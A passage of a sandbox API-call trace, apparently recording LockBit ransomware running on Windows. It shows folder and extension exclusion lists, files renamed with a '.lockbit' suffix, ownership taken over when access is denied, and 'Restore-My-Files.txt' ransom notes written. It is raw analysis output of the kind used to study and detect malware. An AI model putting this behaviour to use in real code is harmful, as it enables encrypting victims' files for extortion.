[0089.646] GetLastError () returned 0x3e5 [0089.646] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions") returned 1 [0089.647] wsprintfW (in: param_1=0x344c3d8, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\Restore-My-Files.txt") returned 86 [0089.647] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0089.647] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90061861, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x90061861, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x90061861, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xcf, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="web.xml", cAlternateFileName="")) returned 0 [0089.647] GetLastError () returned 0x12 [0089.647] FindClose (in: hFindFile=0x2e3290 | out: hFindFile=0x2e3290) returned 1 [0089.647] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="he-IL", cAlternateFileName="")) returned 1 [0089.647] lstrcmpiW (lpString1=".", lpString2="he-IL") returned -1 [0089.648] lstrcmpiW (lpString1="..", lpString2="he-IL") returned -1 [0089.648] lstrcmpiW (lpString1="he-IL", lpString2="$windows.~bt") returned 1 [0089.648] lstrcmpiW (lpString1="he-IL", lpString2="intel") returned -1 [0089.648] lstrcmpiW (lpString1="he-IL", lpString2="msocache") returned -1 [0089.648] lstrcmpiW (lpString1="he-IL", lpString2="$recycle.bin") returned 1 [0089.648] lstrcmpiW (lpString1="he-IL", lpString2="$windows.~ws") returned 1 [0089.648] lstrcmpiW (lpString1="he-IL", lpString2="tor browser") returned -1 [0089.648] lstrcmpiW (lpString1="he-IL", lpString2="boot") returned 1 [0089.648] lstrcmpiW (lpString1="he-IL", lpString2="system volume information") returned -1 [0089.648] lstrcmpiW (lpString1="he-IL", lpString2="perflogs") returned -1 [0089.648] lstrcmpiW (lpString1="he-IL", lpString2="google") returned 1 [0089.648] lstrcmpiW (lpString1="he-IL", lpString2="application data") returned 1 [0089.648] lstrcmpiW (lpString1="he-IL", lpString2="windows") returned -1 [0089.648] lstrcmpiW (lpString1="he-IL", lpString2="windows.old") returned -1 [0089.648] lstrcmpiW (lpString1="he-IL", lpString2="appdata") returned 1 [0089.648] lstrcmpiW (lpString1="he-IL", lpString2="Windows nt") returned -1 [0089.648] lstrcmpiW (lpString1="he-IL", lpString2="Msbuild") returned -1 [0089.648] lstrcmpiW (lpString1="he-IL", lpString2="Microsoft") returned -1 [0089.648] lstrcmpiW (lpString1="he-IL", lpString2="All users") returned 1 [0089.648] lstrcmpiW (lpString1="he-IL", lpString2="mozilla") returned -1 [0089.648] wsprintfW (in: param_1=0x344d200, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL") returned 57 [0089.648] wsprintfW (in: param_1=0x344ca60, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\*") returned 59 [0089.648] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\*" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\he-il\\*"), fInfoLevelId=0x0, lpFindFileData=0x344cf48, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x344cf48) returned 0x2e3290 [0089.650] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0089.650] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="..", cAlternateFileName="")) returned 1 [0089.650] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0089.650] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0089.650] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2bbf40b, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe2dd4721, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe2dd4721, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0089.650] lstrcmpiW (lpString1=".", lpString2="tipresx.dll.mui") returned -1 [0089.651] lstrcmpiW (lpString1="..", lpString2="tipresx.dll.mui") returned -1 [0089.651] PathFindExtensionW (pszPath="tipresx.dll.mui") returned=".mui" [0089.651] lstrcmpiW (lpString1=".386", lpString2=".mui") returned -1 [0089.651] lstrcmpiW (lpString1=".cmd", lpString2=".mui") returned -1 [0089.651] lstrcmpiW (lpString1=".exe", lpString2=".mui") returned -1 [0089.651] lstrcmpiW (lpString1=".ani", lpString2=".mui") returned -1 [0089.651] lstrcmpiW (lpString1=".adv", lpString2=".mui") returned -1 [0089.651] lstrcmpiW (lpString1=".theme", lpString2=".mui") returned 1 [0089.651] lstrcmpiW (lpString1=".msi", lpString2=".mui") returned -1 [0089.651] lstrcmpiW (lpString1=".msp", lpString2=".mui") returned -1 [0089.651] lstrcmpiW (lpString1=".com", lpString2=".mui") returned -1 [0089.651] lstrcmpiW (lpString1=".diagpkg", lpString2=".mui") returned -1 [0089.651] lstrcmpiW (lpString1=".nls", lpString2=".mui") returned 1 [0089.651] lstrcmpiW (lpString1=".diagcab", lpString2=".mui") returned -1 [0089.651] lstrcmpiW (lpString1=".lock", lpString2=".mui") returned -1 [0089.651] lstrcmpiW (lpString1=".ocx", lpString2=".mui") returned 1 [0089.651] lstrcmpiW (lpString1=".mpa", lpString2=".mui") returned -1 [0089.651] lstrcmpiW (lpString1=".cpl", lpString2=".mui") returned -1 [0089.651] lstrcmpiW (lpString1=".mod", lpString2=".mui") returned -1 [0089.651] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0089.651] lstrcmpiW (lpString1=".icns", lpString2=".mui") returned -1 [0089.651] lstrcmpiW (lpString1=".prf", lpString2=".mui") returned 1 [0089.651] lstrcmpiW (lpString1=".rtp", lpString2=".mui") returned 1 [0089.651] lstrcmpiW (lpString1=".diagcfg", lpString2=".mui") returned -1 [0089.652] lstrcmpiW (lpString1=".msstyles", lpString2=".mui") returned -1 [0089.652] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0089.652] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0089.652] lstrcmpiW (lpString1=".shs", lpString2=".mui") returned 1 [0089.652] lstrcmpiW (lpString1=".drv", lpString2=".mui") returned -1 [0089.652] lstrcmpiW (lpString1=".wpx", lpString2=".mui") returned 1 [0089.652] lstrcmpiW (lpString1=".bat", lpString2=".mui") returned -1 [0089.652] lstrcmpiW (lpString1=".rom", lpString2=".mui") returned 1 [0089.652] lstrcmpiW (lpString1=".msc", lpString2=".mui") returned -1 [0089.652] lstrcmpiW (lpString1=".spl", lpString2=".mui") returned 1 [0089.652] lstrcmpiW (lpString1=".ps1", lpString2=".mui") returned 1 [0089.652] lstrcmpiW (lpString1=".msu", lpString2=".mui") returned -1 [0089.652] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0089.652] lstrcmpiW (lpString1=".key", lpString2=".mui") returned -1 [0090.651] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0090.651] lstrcmpiW (lpString1=".reg", lpString2=".mui") returned 1 [0090.651] lstrcmpiW (lpString1=".dll", lpString2=".mui") returned -1 [0090.651] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0090.652] lstrcmpiW (lpString1=".idx", lpString2=".mui") returned -1 [0090.652] lstrcmpiW (lpString1=".sys", lpString2=".mui") returned 1 [0090.652] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0090.652] lstrcmpiW (lpString1=".ico", lpString2=".mui") returned -1 [0090.652] lstrcmpiW (lpString1=".lnk", lpString2=".mui") returned -1 [0090.652] lstrcmpiW (lpString1=".rdp", lpString2=".mui") returned 1 [0090.652] wsprintfW (in: param_1=0x344ce80, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0090.652] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="tipresx.dll.mui") returned -1 [0090.652] lstrcmpiW (lpString1="ntldr", lpString2="tipresx.dll.mui") returned -1 [0090.652] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="tipresx.dll.mui") returned -1 [0090.652] lstrcmpiW (lpString1="bootsect.bak", lpString2="tipresx.dll.mui") returned -1 [0090.652] lstrcmpiW (lpString1="autorun.inf", lpString2="tipresx.dll.mui") returned -1 [0090.652] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\") returned="" [0090.652] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\tipresx.dll.mui") returned=".mui" [0090.652] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0090.652] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0090.652] lstrcmpiW (lpString1=".7z", lpString2=".mui") returned -1 [0090.652] lstrcmpiW (lpString1=".ckp", lpString2=".mui") returned -1 [0090.652] lstrcmpiW (lpString1=".dacpac", lpString2=".mui") returned -1 [0090.652] lstrcmpiW (lpString1=".db", lpString2=".mui") returned -1 [0090.652] lstrcmpiW (lpString1=".db-shm", lpString2=".mui") returned -1 [0090.652] lstrcmpiW (lpString1=".db-wal", lpString2=".mui") returned -1 [0090.652] lstrcmpiW (lpString1=".db3", lpString2=".mui") returned -1 [0090.652] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0090.652] lstrcmpiW (lpString1=".dbc", lpString2=".mui") returned -1 [0090.652] lstrcmpiW (lpString1=".dbs", lpString2=".mui") returned -1 [0090.652] lstrcmpiW (lpString1=".dbt", lpString2=".mui") returned -1 [0090.652] lstrcmpiW (lpString1=".dbv", lpString2=".mui") returned -1 [0090.652] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0090.652] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0090.652] lstrcmpiW (lpString1=".mrg", lpString2=".mui") returned -1 [0090.653] lstrcmpiW (lpString1=".mwb", lpString2=".mui") returned 1 [0090.653] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0090.653] lstrcmpiW (lpString1=".ndf", lpString2=".mui") returned 1 [0090.653] lstrcmpiW (lpString1=".qry", lpString2=".mui") returned 1 [0090.653] lstrcmpiW (lpString1=".sdb", lpString2=".mui") returned 1 [0090.653] lstrcmpiW (lpString1=".sdf", lpString2=".mui") returned 1 [0090.653] lstrcmpiW (lpString1=".sql", lpString2=".mui") returned 1 [0090.653] lstrcmpiW (lpString1=".sqlite", lpString2=".mui") returned 1 [0090.653] lstrcmpiW (lpString1=".sqlite3", lpString2=".mui") returned 1 [0090.653] lstrcmpiW (lpString1=".sqlitedb", lpString2=".mui") returned 1 [0090.653] lstrcmpiW (lpString1=".tmd", lpString2=".mui") returned 1 [0090.653] wsprintfW (in: param_1=0x344c620, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\tipresx.dll.mui.lockbit") returned 81 [0090.653] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0090.653] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\he-il\\tipresx.dll.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\tipresx.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\he-il\\tipresx.dll.mui.lockbit")) returned 0 [0090.653] GetLastError () returned 0x5 [0090.654] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0090.654] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0090.654] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0090.654] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0090.654] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0090.654] NtOpenFile (in: FileHandle=0x344c5c8, DesiredAccess=0x80, ObjectAttributes=0x344c478*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\he-il\\tipresx.dll.mui"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344c470, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344c5c8*=0x3c4, IoStatusBlock=0x344c470*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0090.655] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0090.655] NtQueryInformationFile (in: FileHandle=0x3c4, IoStatusBlock=0x344c490, FileInformation=0x344c350, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344c490, FileInformation=0x344c350) returned 0x0 [0090.777] NtClose (Handle=0x3c4) returned 0x0 [0090.777] RtlFreeAnsiString (AnsiString="\\") [0090.777] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344c604 | out: TokenHandle=0x344c604*=0x3c4) returned 1 [0090.777] malloc (_Size=0x200) returned 0x53fcc0 [0090.777] GetTokenInformation (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344c600 | out: TokenInformation=0x53fcc0, ReturnLength=0x344c600) returned 1 [0090.778] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344c5e8, dwRevision=0x1 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0090.778] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344c5e8, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0090.778] CloseHandle (hObject=0x3c4) returned 1 [0090.778] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\tipresx.dll.mui", SecurityInformation=0x1, pSecurityDescriptor=0x344c5e8) returned 1 [0090.778] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\tipresx.dll.mui", SecurityInformation=0x4, pSecurityDescriptor=0x344c5e8) returned 1 [0090.779] free (_Block=0x53fcc0) [0090.779] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0090.779] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\he-il\\tipresx.dll.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\tipresx.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\he-il\\tipresx.dll.mui.lockbit")) returned 1 [0090.780] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\tipresx.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\he-il\\tipresx.dll.mui.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0090.780] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0090.780] malloc (_Size=0x40068) returned 0x206b860 [0090.780] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x206b878 | out: lpFileSize=0x206b878*=3584) returned 1 [0090.780] ReadFile (in: hFile=0x3c4, lpBuffer=0x206b894, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0090.917] GetLastError () returned 0x3e5 [0090.917] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\tipresx.dll.mui" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL") returned 1 [0090.917] wsprintfW (in: param_1=0x344c3d8, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\Restore-My-Files.txt") returned 78 [0090.917] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\he-il\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0090.918] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0090.918] malloc (_Size=0x40068) returned 0x20abae0 [0090.918] WriteFile (in: hFile=0x3c0, lpBuffer=0x2064f58, nNumberOfBytesToWrite=0x3a1, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x2064f58, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0) returned 0x0 [0090.920] GetLastError () returned 0x3e5 [0090.920] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2bbf40b, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe2dd4721, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe2dd4721, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0090.921] GetLastError () returned 0x12 [0090.921] FindClose (in: hFindFile=0x2e3290 | out: hFindFile=0x2e3290) returned 1 [0090.921] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="hr-HR", cAlternateFileName="")) returned 1 [0090.921] lstrcmpiW (lpString1=".", lpString2="hr-HR") returned -1 [0090.921] lstrcmpiW (lpString1="..", lpString2="hr-HR") returned -1 [0090.921] lstrcmpiW (lpString1="hr-HR", lpString2="$windows.~bt") returned 1 [0090.921] lstrcmpiW (lpString1="hr-HR", lpString2="intel") returned -1 [0090.921] lstrcmpiW (lpString1="hr-HR", lpString2="msocache") returned -1 [0090.921] lstrcmpiW (lpString1="hr-HR", lpString2="$recycle.bin") returned 1 [0090.921] lstrcmpiW (lpString1="hr-HR", lpString2="$windows.~ws") returned 1 [0090.921] lstrcmpiW (lpString1="hr-HR", lpString2="tor browser") returned -1 [0090.921] lstrcmpiW (lpString1="hr-HR", lpString2="boot") returned 1 [0090.921] lstrcmpiW (lpString1="hr-HR", lpString2="system volume information") returned -1 [0090.921] lstrcmpiW (lpString1="hr-HR", lpString2="perflogs") returned -1 [0090.921] lstrcmpiW (lpString1="hr-HR", lpString2="google") returned 1 [0090.921] lstrcmpiW (lpString1="hr-HR", lpString2="application data") returned 1 [0090.921] lstrcmpiW (lpString1="hr-HR", lpString2="windows") returned -1 [0090.921] lstrcmpiW (lpString1="hr-HR", lpString2="windows.old") returned -1 [0090.921] lstrcmpiW (lpString1="hr-HR", lpString2="appdata") returned 1 [0090.922] lstrcmpiW (lpString1="hr-HR", lpString2="Windows nt") returned -1 [0090.922] lstrcmpiW (lpString1="hr-HR", lpString2="Msbuild") returned -1 [0090.922] lstrcmpiW (lpString1="hr-HR", lpString2="Microsoft") returned -1 [0090.922] lstrcmpiW (lpString1="hr-HR", lpString2="All users") returned 1 [0090.922] lstrcmpiW (lpString1="hr-HR", lpString2="mozilla") returned -1 [0090.922] wsprintfW (in: param_1=0x344d200, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR") returned 57 [0090.922] wsprintfW (in: param_1=0x344ca60, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\*") returned 59 [0090.922] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\*" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hr-hr\\*"), fInfoLevelId=0x0, lpFindFileData=0x344cf48, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x344cf48) returned 0x2e3290 [0090.923] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0090.923] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="..", cAlternateFileName="")) returned 1 [0090.923] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0090.923] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0090.923] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe50f08dd, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe539e167, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe539e167, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0090.923] lstrcmpiW (lpString1=".", lpString2="tipresx.dll.mui") returned -1 [0090.923] lstrcmpiW (lpString1="..", lpString2="tipresx.dll.mui") returned -1 [0090.923] PathFindExtensionW (pszPath="tipresx.dll.mui") returned=".mui" [0090.923] lstrcmpiW (lpString1=".386", lpString2=".mui") returned -1 [0090.923] lstrcmpiW (lpString1=".cmd", lpString2=".mui") returned -1 [0090.923] lstrcmpiW (lpString1=".exe", lpString2=".mui") returned -1 [0090.923] lstrcmpiW (lpString1=".ani", lpString2=".mui") returned -1 [0090.923] lstrcmpiW (lpString1=".adv", lpString2=".mui") returned -1 [0090.923] lstrcmpiW (lpString1=".theme", lpString2=".mui") returned 1 [0090.923] lstrcmpiW (lpString1=".msi", lpString2=".mui") returned -1 [0090.923] lstrcmpiW (lpString1=".msp", lpString2=".mui") returned -1 [0090.923] lstrcmpiW (lpString1=".com", lpString2=".mui") returned -1 [0090.923] lstrcmpiW (lpString1=".diagpkg", lpString2=".mui") returned -1 [0090.923] lstrcmpiW (lpString1=".nls", lpString2=".mui") returned 1 [0090.923] lstrcmpiW (lpString1=".diagcab", lpString2=".mui") returned -1 [0090.924] lstrcmpiW (lpString1=".lock", lpString2=".mui") returned -1 [0090.924] lstrcmpiW (lpString1=".ocx", lpString2=".mui") returned 1 [0090.924] lstrcmpiW (lpString1=".mpa", lpString2=".mui") returned -1 [0090.924] lstrcmpiW (lpString1=".cpl", lpString2=".mui") returned -1 [0090.924] lstrcmpiW (lpString1=".mod", lpString2=".mui") returned -1 [0090.924] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0090.924] lstrcmpiW (lpString1=".icns", lpString2=".mui") returned -1 [0090.924] lstrcmpiW (lpString1=".prf", lpString2=".mui") returned 1 [0090.924] lstrcmpiW (lpString1=".rtp", lpString2=".mui") returned 1 [0090.924] lstrcmpiW (lpString1=".diagcfg", lpString2=".mui") returned -1 [0090.924] lstrcmpiW (lpString1=".msstyles", lpString2=".mui") returned -1 [0090.924] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0090.924] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0090.924] lstrcmpiW (lpString1=".shs", lpString2=".mui") returned 1 [0090.924] lstrcmpiW (lpString1=".drv", lpString2=".mui") returned -1 [0090.924] lstrcmpiW (lpString1=".wpx", lpString2=".mui") returned 1 [0090.924] lstrcmpiW (lpString1=".bat", lpString2=".mui") returned -1 [0090.924] lstrcmpiW (lpString1=".rom", lpString2=".mui") returned 1 [0090.924] lstrcmpiW (lpString1=".msc", lpString2=".mui") returned -1 [0090.924] lstrcmpiW (lpString1=".spl", lpString2=".mui") returned 1 [0090.924] lstrcmpiW (lpString1=".ps1", lpString2=".mui") returned 1 [0090.924] lstrcmpiW (lpString1=".msu", lpString2=".mui") returned -1 [0090.924] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0090.925] lstrcmpiW (lpString1=".key", lpString2=".mui") returned -1 [0090.925] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0090.925] lstrcmpiW (lpString1=".reg", lpString2=".mui") returned 1 [0090.925] lstrcmpiW (lpString1=".dll", lpString2=".mui") returned -1 [0090.925] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0090.925] lstrcmpiW (lpString1=".idx", lpString2=".mui") returned -1 [0090.925] lstrcmpiW (lpString1=".sys", lpString2=".mui") returned 1 [0090.925] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0090.925] lstrcmpiW (lpString1=".ico", lpString2=".mui") returned -1 [0090.925] lstrcmpiW (lpString1=".lnk", lpString2=".mui") returned -1 [0090.925] lstrcmpiW (lpString1=".rdp", lpString2=".mui") returned 1 [0090.925] wsprintfW (in: param_1=0x344ce80, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0090.925] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="tipresx.dll.mui") returned -1 [0090.925] lstrcmpiW (lpString1="ntldr", lpString2="tipresx.dll.mui") returned -1 [0090.925] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="tipresx.dll.mui") returned -1 [0090.925] lstrcmpiW (lpString1="bootsect.bak", 